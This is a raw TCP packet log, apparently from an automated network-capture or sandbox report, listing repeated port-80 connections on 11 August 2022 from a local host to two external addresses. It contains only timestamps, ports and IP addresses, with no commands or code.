                  Aug 11, 2022 06:42:17.449698925 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.452589035 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.469443083 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.469538927 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.486363888 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.548320055 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.548495054 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.565593004 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.772173882 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.772280931 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.517294884 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.534280062 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.534388065 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.537200928 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.554110050 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.554195881 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.571082115 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641688108 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641735077 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641812086 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.658911943 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.570935011 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.588134050 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.590482950 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.613256931 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.630363941 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.630528927 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.647604942 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732111931 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732347012 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.732391119 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732456923 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.749492884 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:20.722404003 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.739322901 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.739495993 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.745320082 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.762134075 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.762243032 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.779179096 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839010000 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839044094 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839148998 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.839890003 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.856784105 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:21.812501907 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.829464912 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.829591990 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.832277060 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.849179983 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.849293947 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.866066933 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.929147005 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.929270983 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.930432081 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.930520058 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.946242094 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:22.942922115 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:22.959748030 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:22.961738110 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:22.964431047 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:22.981486082 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:22.982178926 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:22.999497890 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:23.073542118 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:23.073584080 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:23.073744059 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:23.073791027 CEST4975180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:23.090759039 CEST8049751188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:24.020174980 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.037133932 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:24.037308931 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.044622898 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.061687946 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:24.061861992 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.078896999 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:24.175990105 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:24.176037073 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:24.176181078 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.180687904 CEST4975280192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:24.197565079 CEST8049752188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:25.187084913 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.203994989 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:25.204076052 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.207102060 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.223891973 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:25.223962069 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.240777969 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:25.319336891 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:25.319418907 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:25.319447041 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.319473982 CEST4975380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:25.336364031 CEST8049753188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.287018061 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.304059029 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.304929972 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.308314085 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.325150013 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.325208902 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.342170000 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.415497065 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.415548086 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:26.415707111 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.415816069 CEST4975480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:26.432638884 CEST8049754188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:27.368329048 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.385637999 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:27.385802984 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.395951986 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.413130999 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:27.413217068 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.430319071 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:27.495721102 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:27.495778084 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:27.495922089 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.495971918 CEST4975580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:27.513151884 CEST8049755188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.417392969 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.434387922 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.434564114 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.447484016 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.464387894 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.464462996 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.481306076 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.548753977 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.548799038 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:28.548935890 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.552529097 CEST4975680192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:28.569401979 CEST8049756188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:29.588490009 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.605339050 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:29.605452061 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.610435963 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.627255917 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:29.627373934 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.644181967 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:29.709315062 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:29.709371090 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:29.709475040 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.709501028 CEST4975780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:29.726356030 CEST8049757188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.636073112 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.652921915 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.653377056 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.656105042 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.672878981 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.672983885 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.689851046 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.750089884 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.750333071 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:30.750473976 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.750526905 CEST4975880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:30.767277002 CEST8049758188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.662673950 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.679579973 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.679691076 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.695873976 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.719538927 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.719686031 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.736479998 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.798857927 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.798902988 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:31.799010992 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.799355030 CEST4975980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:31.816118002 CEST8049759188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:32.884382963 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:32.901541948 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:32.901670933 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:32.923604012 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:32.941028118 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:32.941155910 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:32.958271027 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:33.030349016 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:33.030396938 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:33.030462980 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:33.030495882 CEST4976080192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:33.047614098 CEST8049760188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:33.959796906 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:33.976710081 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:33.979643106 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:34.002289057 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:34.019325018 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:34.019488096 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:34.036395073 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:34.089981079 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:34.090102911 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:34.090325117 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:34.090471029 CEST4976180192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:34.106941938 CEST8049761188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:35.910921097 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:35.928006887 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:35.928137064 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:35.961536884 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:35.978678942 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:35.978749990 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:35.995698929 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:36.063500881 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:36.063543081 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:36.063702106 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:36.068044901 CEST4976280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:36.085135937 CEST8049762188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.305047989 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.322096109 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.322242975 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.324990988 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.341823101 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.341988087 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.358833075 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.416142941 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.416187048 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:39.416273117 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.416321039 CEST4976380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:39.433171988 CEST8049763188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:41.168018103 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.184937954 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:41.185110092 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.209816933 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.226772070 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:41.226878881 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.243835926 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:41.306250095 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:41.306293011 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:41.306368113 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.306406021 CEST4976480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:41.323308945 CEST8049764188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:42.751256943 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.768125057 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:42.768299103 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.773950100 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.790827036 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:42.792331934 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.809173107 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:42.869123936 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:42.869276047 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:42.869368076 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.869415998 CEST4976680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:42.886429071 CEST8049766188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.079581976 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.096406937 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.096509933 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.099149942 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.115915060 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.116035938 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.132843971 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.189769983 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.189821959 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:44.189883947 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.189915895 CEST4977480192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:44.206715107 CEST8049774188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:45.257196903 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.274211884 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:45.274322033 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.276947975 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.293843031 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:45.294847012 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.311892033 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:45.373523951 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:45.373560905 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:45.373722076 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.374530077 CEST4977780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:45.391436100 CEST8049777188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:46.923748970 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:46.940895081 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:46.941090107 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:46.945645094 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:46.962704897 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:46.962881088 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:46.979835033 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:47.043102980 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:47.043138027 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:47.043222904 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:47.043953896 CEST4977880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:47.060772896 CEST8049778188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.119430065 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.136759043 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.136955976 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.154690027 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.171808004 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.172816992 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.189809084 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.279305935 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.279371977 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:49.279472113 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.279522896 CEST4978080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:49.296511889 CEST8049780188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.537385941 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.554279089 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.554387093 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.570997000 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.587933064 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.588017941 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.604933977 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.665591955 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.665627003 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:50.665725946 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.668934107 CEST4978280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:50.685993910 CEST8049782188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:51.854746103 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:51.871905088 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:51.872061014 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:51.879415035 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:51.896822929 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:51.896985054 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:51.914129972 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:51.983930111 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:51.984774113 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:52.002202988 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:52.209759951 CEST8049785188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:52.211519003 CEST4978580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.177912951 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.194900036 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:53.195066929 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.219319105 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.236185074 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:53.236259937 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.253082037 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:53.353355885 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:53.353394032 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:53.353482962 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.353513002 CEST4978680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:53.370316982 CEST8049786188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:54.292475939 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:54.309432030 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.310303926 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:54.331478119 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:54.348395109 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.348571062 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:54.365434885 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.430865049 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.431103945 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:54.448460102 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.654195070 CEST8049788188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:54.654386997 CEST4978880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:55.392188072 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.409404039 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:55.410268068 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.412962914 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.430023909 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:55.430126905 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.447530985 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:55.514800072 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:55.514834881 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:55.515017033 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.515289068 CEST4978980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:55.532382011 CEST8049789188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:56.617532969 CEST4979080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:56.634504080 CEST8049790188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:56.634614944 CEST4979080192.168.2.3188.114.97.3
